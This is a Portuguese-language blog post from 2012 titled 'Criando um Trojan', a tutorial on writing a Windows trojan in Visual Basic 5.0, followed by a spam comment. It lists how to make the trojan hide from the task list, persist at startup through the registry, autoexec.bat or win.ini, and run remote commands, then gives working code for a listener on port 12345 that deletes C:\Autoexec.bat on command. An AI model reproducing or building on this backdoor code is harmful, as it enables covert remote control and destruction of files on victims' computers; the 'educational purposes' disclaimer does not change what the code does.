segunda-feira, 7 de maio de 2012

Criando um Trojan

00. O quê é um trojan?
01. O quê é preciso para criar um trojan?
02. Qual linguagem de programação utilizaremos?
03. Começando a programar
04. Exemplo básico de um trojan em Visual Basic
05. Palavras finais
00. O quê é um trojan?
Trojan é uma abreviatura de Trojan Horse (Cavalo de Tróia).
Tem esse nome pela semelhança com o cavalo de madeira usado
pelos troianos pra invadir a base de seus inimigos.
Vendo pelo lado da informática, é um programa que ouve em
uma porta do seu sistema e aguarda comandos de um cliente.
01. O quê é preciso para criar um trojan?
Um conhecimento bom em programação em qualquer linguagem.
Aconselho o uso de Delphi e Visual Basic p/ escrita de trojans
p/ Windows e C, Assembly ou LKM p/ escrita de trojans p/ Linux.
02. Qual linguagem de programação utilizaremos?
Visual Basic 5.0.
03. Começando a programar
Pra começar a programar você precisa saber umas coisas básicas.
Aqui vão elas:
* Conhecer bem uma linguagem de programação, aqui, no caso do
tutorial a utilizada é o Visual Basic 5.0 da Micro$oft.
* O trojan deve ficar oculto na lista de tarefas do Windows
(ctrl alt del)
* O trojan deve ouvir em uma porta TCP ou UDP e aguardar comandos.
* O trojan deve interpretar os comandos recebidos pelo cliente
e os executar na máquina infectada(servidor).
* O trojan deve se auto iniciar junto com o Windows, para isso você
pode usar uma chave no registro do Windows, autoexec.bat, win.ini
ou qualquer outro meio desde que o servidor se inicie com o Windows.
04. Exemplo básico de um trojan em Visual Basic
Crie um projeto no Visual Basic e adicione a Winsock no formulário
(Ctrl + T e marque a Microsoft Winsock Control 5.0)
Dê dois cliques no ícone da winsock na toolbox p/ adiciona-la
ao nosso formulário.
Dê dois cliques no formulário p/ entrarmos na Code Window
Pronto… estamos na Code Window. É aqui que faremos o nosso trojan.
Escreva isso:
Private Sub Form_Load()
Winsock1.LocalPort = “12345″
Winsock1.Listen
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim recebido As String
Winsock1.GetData recebido
If recebido = “deletar_autoexec” Then
Kill “C:\Autoexec.bat”
End If
End Sub
Explicando o código:
Winsock1.LocalPort = “12345″
* Configura a Winsock p/ ficar na porta 12345
Winsock1.Listen
* Coloca a Winsock em estado de espera(ouvindo) na porta 12345
Dim recebido As String
* Declara a variável “recebido” como String
Winsock1.GetData recebido
* Informa a Winsock que a variável “recebido” irá guardar
* todas as strings recebidas(enviadas pelo cliente)
If recebido = “deletar_autoexec” Then
Kill “C:\Autoexec.bat”
End If
* Esse código diz que se a variável “recebido” receber a string
“deletar_autoexec” o arquivo C:\Autoexec.bat será deletado.
O básico(muito básico mesmo!!!) de um trojan é isso…
05. Palavras finais
Bem… chegamos ao fim desse tutorial…
Pra programar um trojan é preciso muito mais que isso mais o
ponta pé inicial foi dado…
( material para fins educacionais, não nos responsabilizamos pelo uso indevido do mesmo)

1 comentários:

Mateus L Lima disse...

parceria ae..Vou adicionar seu site. .parceiro.
meu site. http:// mateuslima09.mywapblog.com

Postar um comentário